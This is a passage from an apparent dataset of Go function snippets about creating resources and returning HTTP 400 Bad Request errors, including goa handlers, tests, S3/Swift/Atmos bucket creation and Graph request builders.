json.NewEncoder(w).Encode(newCategory); err != nil {\n\t\tlog.Printf(err.Error())\n\t\tw.WriteHeader(500)\n\t\treturn\n\t}\n}", "func (ctx *CreateFilterContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func CreateBadRequestResponse(w http.ResponseWriter, err error) {\n\tw.WriteHeader(http.StatusBadRequest)\n\tbytes, _ := json.Marshal(err.Error())\n\tw.Write(bytes)\n}", "func CreateBucket(w http.ResponseWriter, r *http.Request) *appError {\n decoder := json.NewDecoder(r.Body)\n var ecsBucket ECSBucket\n err := decoder.Decode(&ecsBucket)\n if err != nil {\n return &appError{err: err, status: http.StatusBadRequest, json: \"Can't decode JSON data\"}\n }\n headers := make(map[string][]string)\n if ecsBucket.ReplicationGroup != \"\" {\n headers[\"x-emc-vpool\"] = []string{ecsBucket.ReplicationGroup}\n }\n if ecsBucket.MetadataSearch != \"\" {\n headers[\"x-emc-metadata-search\"] = []string{ecsBucket.MetadataSearch}\n }\n if ecsBucket.EnableADO {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"false\"}\n }\n if ecsBucket.EnableFS {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableCompliance {\n headers[\"x-emc-compliance-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-compliance-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableEncryption {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"false\"}\n }\n retentionEnabled := false\n headers[\"x-emc-retention-period\"] = []string{\"0\"}\n if ecsBucket.Retention != \"\" {\n days, err := strconv.ParseInt(ecsBucket.Retention, 10, 64)\n if err == nil {\n if days > 0 {\n seconds := days * 24 * 3600\n headers[\"x-emc-retention-period\"] = []string{int64toString(seconds)}\n retentionEnabled = true\n }\n }\n }\n var expirationCurrentVersions int64\n expirationCurrentVersions = 0\n if ecsBucket.ExpirationCurrentVersions != \"\" {\n days, err := strconv.ParseInt(ecsBucket.ExpirationCurrentVersions, 10, 64)\n if err == nil {\n expirationCurrentVersions = days\n }\n }\n var expirationNonCurrentVersions int64\n expirationNonCurrentVersions = 0\n if ecsBucket.ExpirationNonCurrentVersions != \"\" {\n days, err := strconv.ParseInt(ecsBucket.ExpirationNonCurrentVersions, 10, 64)\n if err == nil && ecsBucket.EnableVersioning {\n expirationNonCurrentVersions = days\n }\n }\n var bucketCreateResponse Response\n if ecsBucket.Api == \"s3\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = s3Request(s3, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: err.Error()}\n }\n versioningStatusOK := true\n lifecyclePolicyStatusOK := true\n // If the bucket has been created\n if bucketCreateResponse.Code == 200 {\n if !retentionEnabled && ecsBucket.EnableVersioning {\n // Enable versioning\n enableVersioningHeaders := map[string][]string{}\n enableVersioningHeaders[\"Content-Type\"] = []string{\"application/xml\"}\n versioningConfiguration := `\n <VersioningConfiguration xmlns=\"http://s3.amazonaws.com/doc/2006-03-01/\">\n <Status>Enabled</Status>\n <MfaDelete>Disabled</MfaDelete>\n </VersioningConfiguration>\n `\n enableVersioningResponse, _ := s3Request(s3, ecsBucket.Name, \"PUT\", \"/?versioning\", enableVersioningHeaders, versioningConfiguration)\n if enableVersioningResponse.Code != 200 {\n versioningStatusOK = false\n }\n }\n if expirationCurrentVersions > 0 || expirationNonCurrentVersions > 0 {\n lifecyclePolicyHeaders := map[string][]string{}\n lifecyclePolicyHeaders[\"Content-Type\"] = []string{\"application/xml\"}\n lifecyclePolicyConfiguration := `\n <LifecycleConfiguration>\n <Rule>\n <ID>expiration</ID>\n <Prefix></Prefix>\n <Status>Enabled</Status>\n `\n if expirationCurrentVersions > 0 && expirationNonCurrentVersions > 0 {\n // Enable expiration for both current and non current versions\n lifecyclePolicyConfiguration += \"<Expiration><Days>\" + ecsBucket.ExpirationCurrentVersions + \"</Days></Expiration>\"\n lifecyclePolicyConfiguration += \"<NoncurrentVersionExpiration><NoncurrentDays>\" + ecsBucket.ExpirationNonCurrentVersions + \"</NoncurrentDays></NoncurrentVersionExpiration>\"\n } else {\n if expirationCurrentVersions > 0 {\n // Enable expiration for current versions only\n lifecyclePolicyConfiguration += \"<Expiration><Days>\" + ecsBucket.ExpirationCurrentVersions + \"</Days></Expiration>\"\n }\n if expirationNonCurrentVersions > 0 {\n // Enable expiration for non current versions only\n // To fix a bug in ECS 3.0 where an expiration for non current version can't be set if there's no expiration set for current versions\n lifecyclePolicyConfiguration += \"<Expiration><Days>1000000</Days></Expiration>\"\n lifecyclePolicyConfiguration += \"<NoncurrentVersionExpiration><NoncurrentDays>\" + ecsBucket.ExpirationNonCurrentVersions + \"</NoncurrentDays></NoncurrentVersionExpiration>\"\n }\n }\n lifecyclePolicyConfiguration += `\n </Rule>\n </LifecycleConfiguration>\n `\n lifecyclePolicyResponse, _ := s3Request(s3, ecsBucket.Name, \"PUT\", \"/?lifecycle\", lifecyclePolicyHeaders, lifecyclePolicyConfiguration)\n if lifecyclePolicyResponse.Code != 200 {\n lifecyclePolicyStatusOK = false\n }\n }\n if versioningStatusOK && lifecyclePolicyStatusOK {\n rendering.JSON(w, http.StatusOK, \"\")\n } else {\n message := \"\"\n if !versioningStatusOK {\n message += \" Versioning can't be enabled.\"\n }\n if !lifecyclePolicyStatusOK {\n message += \" Expiration can't be set.\"\n }\n rendering.JSON(w, http.StatusOK, message)\n }\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"swift\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = swiftRequest(ecsBucket.Endpoint, s3.AccessKey, ecsBucket.Password, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: err.Error()}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, ecsBucket.Name)\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"atmos\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = atmosRequest(ecsBucket.Endpoint, s3.AccessKey, s3.SecretKey, \"\", \"PUT\", \"/rest/subtenant\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: err.Error()}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, bucketCreateResponse.ResponseHeaders[\"Subtenantid\"][0])\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n }\n\n return nil\n}", "func SetNewBadRequestByFormat(ef *ErrorFormat) *ErrorMessage {\n\treturn &ErrorMessage{\n\t\tCode: http.StatusBadRequest,\n\t\tErrorList: []*ErrorFormat{\n\t\t\tef,\n\t\t},\n\t}\n}", "func NewCreateBadRequest(body *CreateBadRequestResponseBody) *goa.ServiceError {\n\tv := &goa.ServiceError{\n\t\tName: *body.Name,\n\t\tID: *body.ID,\n\t\tMessage: *body.Message,\n\t\tTemporary: *body.Temporary,\n\t\tTimeout: *body.Timeout,\n\t\tFault: *body.Fault,\n\t}\n\n\treturn v\n}", "func ValidateCreateCompanyBadRequestResponseBody(body *CreateCompanyBadRequestResponseBody) (err error) {\n\tif body.Name == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"name\", \"body\"))\n\t}\n\tif body.ID == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"id\", \"body\"))\n\t}\n\tif body.Message == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"message\", \"body\"))\n\t}\n\tif body.Temporary == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"temporary\", \"body\"))\n\t}\n\tif body.Timeout == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"timeout\", \"body\"))\n\t}\n\tif body.Fault == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"fault\", \"body\"))\n\t}\n\treturn\n}", "func (ctx *CreateProfileContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func NewSubCategoryTemplate()(*SubCategoryTemplate) {\n m := &SubCategoryTemplate{\n FilePlanDescriptorTemplate: *NewFilePlanDescriptorTemplate(),\n }\n return m\n}", "func (suite *TenantTestSuite) TestCreateBadJson() {\n\tjsonInput := \"{bad json:{}\"\n\trequest, _ := http.NewRequest(\"POST\", \"/api/v2/admin/tenants\", strings.NewReader(jsonInput))\n\trequest.Header.Set(\"x-api-key\", suite.clientkey)\n\trequest.Header.Set(\"Accept\", \"application/json\")\n\tresponse := httptest.NewRecorder()\n\n\tsuite.router.ServeHTTP(response, request)\n\n\tcode := response.Code\n\toutput := response.Body.String()\n\n\tsuite.Equal(400, code, \"Internal Server Error\")\n\tsuite.Equal(suite.respBadJSON, output, \"Response body mismatch\")\n\n}", "func (id InvalidContainerIDError) BadRequest() {}", "func (client *LROSADsClient) post202RetryInvalidHeaderCreateRequest(ctx context.Context, options *LROSADsClientBeginPost202RetryInvalidHeaderOptions) (*policy.Request, error) {\n\turlPath := \"/lro/error/post/202/retry/invalidheader\"\n\treq, err := runtime.NewRequest(ctx, http.MethodPost, runtime.JoinPaths(host, urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\tif options != nil && options.Product != nil {\n\t\tif err := runtime.MarshalAsJSON(req, *options.Product); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn req, nil\n\t}\n\treturn req, nil\n}", "func badRequest(resp *ApiResponse, msg string) error {\n resp.StatusCode = http.StatusBadRequest\n resp.Message = []byte(msg)\n resp.ErrorMessage = msg\n\n return nil\n}", "func (ctx *CreateCommentContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *PubPshbContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *CreateOfferContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *CreateDogContext) BadRequest() error {\n\tctx.ResponseData.WriteHeader(400)\n\treturn nil\n}", "func CategoriesCreatePOST(c *gin.Context) {\n\tcategory := models.Category{}\n\tcategory.Name = c.PostForm(\"name\")\n\tcategory.Intro = c.PostForm(\"intro\")\n\tcategory.Content = c.PostForm(\"content\")\n\tcategory.Title = c.PostForm(\"title\")\n\tcategory.Description = c.PostForm(\"description\")\n\tcategory.Type = c.PostForm(\"type\")\n\tfile, _ := c.FormFile(\"image\")\n\tif file != nil {\n\t\tif _, err := os.Stat(\"public/upload/\" + category.Type); os.IsNotExist(err) {\n\t\t\tfmt.Println(\"create folder\")\n\t\t\tos.Mkdir(\"public/upload/\"+category.Type, 0755)\n\t\t}\n\t\tc.SaveUploadedFile(file, \"public/upload/\"+category.Type)\n\n\t\tcategory.Image = file.Filename\n\t}\n\tc.JSON(http.StatusBadRequest, gin.H{\"error\": category})\n}", "func CreateCategory(w http.ResponseWriter, req *http.Request) {\n\t// esta variable es el body de categoria, como todos los campos que tenga\n\tvar body domain.Category\n\n\t// comprueba que lo que le hemos pasado tiene los campos que corresponde\n\tif err := parseBody(req, &body); err != nil {\n\t\trespondWithError(w, http.StatusBadRequest, err.Error())\n\t\treturn\n\t}\n\t_, err := domain.InsertCaterogy(body)\n\tif err != nil {\n\t\tbadRequest(w, err.Error())\n\t\treturn\n\t}\n\n\trespondWithJSON(w, http.StatusOK, body)\n}", "func (service *Service) CreateCategory(request *restful.Request, response *restful.Response) {\n\tvar req models.CategoryRequest\n\tif err := request.ReadEntity(&req); err != nil {\n\t\trespondErr(response, http.StatusBadRequest, messageBadRequest,\n\t\t\t\"unable parse request body\")\n\n\t\tlogrus.WithFields(logrus.Fields{\"module\": \"service\", \"resp\": http.StatusBadRequest}).\n\t\t\tError(\"Unable to parse request body:\", err)\n\n\t\treturn\n\t}\n\n\tnewUUID, err := uuid.NewRandom()\n\tif err != nil {\n\t\trespondErr(response, http.StatusInternalServerError, messageServerError,\n\t\t\t\"unable to create uuid\")\n\n\t\tlogrus.WithFields(logrus.Fields{\"module\": \"service\", \"resp\": http.StatusInternalServerError}).\n\t\t\tError(\"Unable to create uuid:\", err)\n\n\t\treturn\n\t}\n\n\tcategory := models.Category{\n\t\tCategoryID: newUUID.String(),\n\t\tName: req.Name,\n\t\tImage: req.Image,\n\t}\n\n\tcreatedCategory, err := service.server.CreateCategory(category)\n\tif err != nil {\n\t\trespondErr(response, http.StatusInternalServerError, messageDatabaseError,\n\t\t\t\"unable to create category\")\n\n\t\tlogrus.WithFields(logrus.Fields{\"module\": \"service\", \"resp\": http.StatusInternalServerError}).\n\t\t\tError(\"Unable to create category:\", err)\n\n\t\treturn\n\t}\n\n\tresult := &models.CreateCategoryResponse{\n\t\tResult: *createdCategory,\n\t}\n\n\twriteResponse(response, http.StatusCreated, result)\n}", "func (m *LabelsCategoriesItemSubCategoriesSubCategoryTemplateItemRequestBuilder) Delete(ctx context.Context, requestConfiguration *LabelsCategoriesItemSubCategoriesSubCategoryTemplateItemRequestBuilderDeleteRequestConfiguration)(error) {\n requestInfo, err := m.ToDeleteRequestInformation(ctx, requestConfiguration);\n if err != nil {\n return err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n }\n err = m.BaseRequestBuilder.RequestAdapter.SendNoContent(ctx, requestInfo, errorMapping)\n if err != nil {\n return err\n }\n return nil\n}", "func (ctx *DeleteOutputContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func NewCreateCompanyBadRequest(body *CreateCompanyBadRequestResponseBody) *goa.ServiceError {\n\tv := &goa.ServiceError{\n\t\tName: *body.Name,\n\t\tID: *body.ID,\n\t\tMessage: *body.Message,\n\t\tTemporary: *body.Temporary,\n\t\tTimeout: *body.Timeout,\n\t\tFault: *body.Fault,\n\t}\n\n\treturn v\n}", "func (rest *TestResourceREST) TestFailRegisterResourceInvalidParentResource() {\n\tresourceDescription := \"Resource description\"\n\tresourceID := \"\"\n\tresourceScopes := []string{}\n\n\tresourceOwnerID := rest.testIdentity.ID\n\tparentResourceID := uuid.NewV4().String()\n\n\tpayload := &app.RegisterResourcePayload{\n\t\tDescription: &resourceDescription,\n\t\tName: \"My new resource\",\n\t\tParentResourceID: &parentResourceID,\n\t\tResourceScopes: resourceScopes,\n\t\tResourceID: &resourceID,\n\t\tResourceOwnerID: resourceOwnerID.String(),\n\t\tType: \"Area\",\n\t}\n\n\ttest.RegisterResourceBadRequest(rest.T(), rest.service.Context, rest.service, rest.securedController, payload)\n}", "func CreateContainerBadRequest(t goatest.TInterface, ctx context.Context, service *goa.Service, ctrl app.ContainerController, command []string, entrypoint []string, env []string, image string, name string, sslRedirect bool, volumes []string, workingDir *string) (http.ResponseWriter, error) {\n\t// Setup service\n\tvar (\n\t\tlogBuf bytes.Buffer\n\t\tresp interface{}\n\n\t\trespSetter goatest.ResponseSetterFunc = func(r interface{}) { resp = r }\n\t)\n\tif service == nil {\n\t\tservice = goatest.Service(&logBuf, respSetter)\n\t} else {\n\t\tlogger := log.New(&logBuf, \"\", log.Ltime)\n\t\tservice.WithLogger(goa.NewLogger(logger))\n\t\tnewEncoder := func(io.Writer) goa.Encoder { return respSetter }\n\t\tservice.Encoder = goa.NewHTTPEncoder() // Make sure the code ends up using this decoder\n\t\tservice.Encoder.Register(newEncoder, \"*/*\")\n\t}\n\n\t// Setup request context\n\trw := httptest.NewRecorder()\n\tquery := url.Values{}\n\t{\n\t\tsliceVal := command\n\t\tquery[\"command\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := entrypoint\n\t\tquery[\"entrypoint\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := env\n\t\tquery[\"env\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := []string{image}\n\t\tquery[\"image\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := []string{name}\n\t\tquery[\"name\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := []string{fmt.Sprintf(\"%v\", sslRedirect)}\n\t\tquery[\"sslRedirect\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := volumes\n\t\tquery[\"volumes\"] = sliceVal\n\t}\n\tif workingDir != nil {\n\t\tsliceVal := []string{*workingDir}\n\t\tquery[\"workingDir\"] = sliceVal\n\t}\n\tu := &url.URL{\n\t\tPath: fmt.Sprintf(\"/api/v2/container/create\"),\n\t\tRawQuery: query.Encode(),\n\t}\n\treq, err := http.NewRequest(\"GET\", u.String(), nil)\n\tif err != nil {\n\t\tpanic(\"invalid test \" + err.Error()) // bug\n\t}\n\tprms := url.Values{}\n\t{\n\t\tsliceVal := command\n\t\tprms[\"command\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := entrypoint\n\t\tprms[\"entrypoint\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := env\n\t\tprms[\"env\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := []string{image}\n\t\tprms[\"image\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := []string{name}\n\t\tprms[\"name\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := []string{fmt.Sprintf(\"%v\", sslRedirect)}\n\t\tprms[\"sslRedirect\"] = sliceVal\n\t}\n\t{\n\t\tsliceVal := volumes\n\t\tprms[\"volumes\"] = sliceVal\n\t}\n\tif workingDir != nil {\n\t\tsliceVal := []string{*workingDir}\n\t\tprms[\"workingDir\"] = sliceVal\n\t}\n\tif ctx == nil {\n\t\tctx = context.Background()\n\t}\n\tgoaCtx := goa.NewContext(goa.WithAction(ctx, \"ContainerTest\"), rw, req, prms)\n\tcreateCtx, _err := app.NewCreateContainerContext(goaCtx, req, service)\n\tif _err != nil {\n\t\te, ok := _err.(goa.ServiceError)\n\t\tif !ok {\n\t\t\tpanic(\"invalid test data \" + _err.Error()) // bug\n\t\t}\n\t\treturn nil, e\n\t}\n\n\t// Perform action\n\t_err = ctrl.Create(createCtx)\n\n\t// Validate response\n\tif _err != nil {\n\t\tt.Fatalf(\"controller returned %+v, logs:\\n%s\", _err, logBuf.String())\n\t}\n\tif rw.Code != 400 {\n\t\tt.Errorf(\"invalid response status code: got %+v, expected 400\", rw.Code)\n\t}\n\tvar mt error\n\tif resp != nil {\n\t\tvar _ok bool\n\t\tmt, _ok = resp.(error)\n\t\tif !_ok {\n\t\t\tt.Fatalf(\"invalid response media: got variable of type %T, value %+v, expected instance of error\", resp, resp)\n\t\t}\n\t}\n\n\t// Return results\n\treturn rw, mt\n}", "func CreateBucket(w http.ResponseWriter, r *http.Request) *appError {\n decoder := json.NewDecoder(r.Body)\n var ecsBucket ECSBucket\n err := decoder.Decode(&ecsBucket)\n if err != nil {\n return &appError{err: err, status: http.StatusBadRequest, json: \"Can't decode JSON data\"}\n }\n headers := make(map[string][]string)\n if ecsBucket.ReplicationGroup != \"\" {\n headers[\"x-emc-vpool\"] = []string{ecsBucket.ReplicationGroup}\n }\n if ecsBucket.MetadataSearch != \"\" {\n headers[\"x-emc-metadata-search\"] = []string{ecsBucket.MetadataSearch}\n }\n if ecsBucket.EnableADO {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"false\"}\n }\n if ecsBucket.EnableFS {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableCompliance {\n headers[\"x-emc-compliance-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-compliance-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableEncryption {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"false\"}\n }\n var bucketCreateResponse Response\n if ecsBucket.Api == \"s3\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = s3Request(s3, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n if bucketCreateResponse.Code == 200 {\n rendering.JSON(w, http.StatusOK, ecsBucket.Name)\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"swift\" {\n bucketCreateResponse, err = swiftRequest(ecsBucket.Endpoint, ecsBucket.User, ecsBucket.Password, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n log.Print(bucketCreateResponse)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, ecsBucket.Name)\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"atmos\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = atmosRequest(ecsBucket.Endpoint, s3.AccessKey, s3.SecretKey, \"\", \"PUT\", \"/rest/subtenant\", headers, \"\")\n if err != nil {\n log.Print(err)\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, bucketCreateResponse.ResponseHeaders[\"Subtenantid\"][0])\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n }\n\n return nil\n}", "func (client *LROSADsClient) postAsyncRelativeRetryInvalidHeaderCreateRequest(ctx context.Context, options *LROSADsClientBeginPostAsyncRelativeRetryInvalidHeaderOptions) (*policy.Request, error) {\n\turlPath := \"/lro/error/postasync/retry/invalidheader\"\n\treq, err := runtime.NewRequest(ctx, http.MethodPost, runtime.JoinPaths(host, urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\tif options != nil && options.Product != nil {\n\t\tif err := runtime.MarshalAsJSON(req, *options.Product); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn req, nil\n\t}\n\treturn req, nil\n}", "func (ctx *DeleteFilterContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (c *SubresourceClient) Create(namespace string, templateValues interface{}) (e error) {\n\tif c.Error != \"\" {\n\t\te = fmt.Errorf(c.Error)\n\t}\n\treturn\n}", "func (ctx *DeleteFeedContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (m *CasesEdiscoveryCasesItemMicrosoftGraphSecurityReopenRequestBuilder) Post(ctx context.Context, requestConfiguration *CasesEdiscoveryCasesItemMicrosoftGraphSecurityReopenRequestBuilderPostRequestConfiguration)(error) {\n requestInfo, err := m.ToPostRequestInformation(ctx, requestConfiguration);\n if err != nil {\n return err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": ia572726a95efa92ddd544552cd950653dc691023836923576b2f4bf716cf204a.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": ia572726a95efa92ddd544552cd950653dc691023836923576b2f4bf716cf204a.CreateODataErrorFromDiscriminatorValue,\n }\n err = m.BaseRequestBuilder.RequestAdapter.SendNoContent(ctx, requestInfo, errorMapping)\n if err != nil {\n return err\n }\n return nil\n}", "func NewCreateBadRequestResponseBody(res *goa.ServiceError) *CreateBadRequestResponseBody {\n\tbody := &CreateBadRequestResponseBody{\n\t\tName: res.Name,\n\t\tID: res.ID,\n\t\tMessage: res.Message,\n\t\tTemporary: res.Temporary,\n\t\tTimeout: res.Timeout,\n\t\tFault: res.Fault,\n\t}\n\treturn body\n}", "func (ctx *CreateUserContext) BadRequest(r error) error {\n\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *DeleteHostContext) BadRequest() error {\n\tctx.ResponseData.WriteHeader(400)\n\treturn nil\n}", "func TestCreateCategory(t *testing.T) {\n\t//initial length of []Categories\n\tinitialLen := len(Categories)\n\t//parameters passed to request body\n\trequestBody := &Category{\n\t\tCategoryName: \t\t\"Super Cool Category\",\n\t\tCategoryDescription: \"Brand new cool Category\",\n\t}\n\tjsonCategory, _ := json.Marshal(requestBody)\n\t//Create a request to pass to the handler with request body as a third parameter\n\treq, err := http.NewRequest(\"POST\", \"/categories/new\", bytes.NewBuffer(jsonCategory))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\trr := httptest.NewRecorder()\n\thandler := http.HandlerFunc(CreateCategory)\n\n\thandler.ServeHTTP(rr, req)\n\n\tassert.Equal(t, 201, rr.Code, \"Created response is expected\")\n\t//the length of []Categories should increase after creating new category\n\tassert.NotEqual(t, initialLen, len(Categories), \"Expected length to increase after creating new Category\")\n}", "func (ctx *SignupAuthenticationContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func TestCreateValidationFail0(t *testing.T) {\n\tisTesting = true\n\tvar request = Request{\n\t\tPath: \"/api/devices\",\n\t\tHTTPMethod: \"POST\",\n\t\tBody: `{\n\n\t\t}`,\n\t}\n\tvar response, _ = Handler(request)\n\tif response.StatusCode != 400 {\n\t\tt.Errorf(\"response status code has to be 400\")\n\t}\n\tif response.Body != `{\"message\":\"device should have valid id\"}` {\n\t\tt.Errorf(\"body is: %s\", response.Body)\n\t}\n}", "func APIBadRequestMsg(c *gin.Context, msg string) {\n\tc.JSON(http.StatusBadRequest, gin.H{\"error\": true, \"msg\": msg})\n}", "func (ctx *StartFeedContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func TestCreateValidationFail2(t *testing.T) {\n\tisTesting = true\n\tvar request = Request{\n\t\tPath: \"/api/devices\",\n\t\tHTTPMethod: \"POST\",\n\t\tBody: `{\n\t\t\t\"id\": \"valid-id\",\n\t\t\t\"deviceModel\": \"valid-device-model\"\n\t\t}`,\n\t}\n\tvar response, _ = Handler(request)\n\tif response.StatusCode != 400 {\n\t\tt.Errorf(\"response status code has to be 400\")\n\t}\n\tif response.Body != `{\"message\":\"device should have valid model\"}` {\n\t\tt.Errorf(\"body is: %s\", response.Body)\n\t}\n}", "func (ctx *UploadOpmlContext) 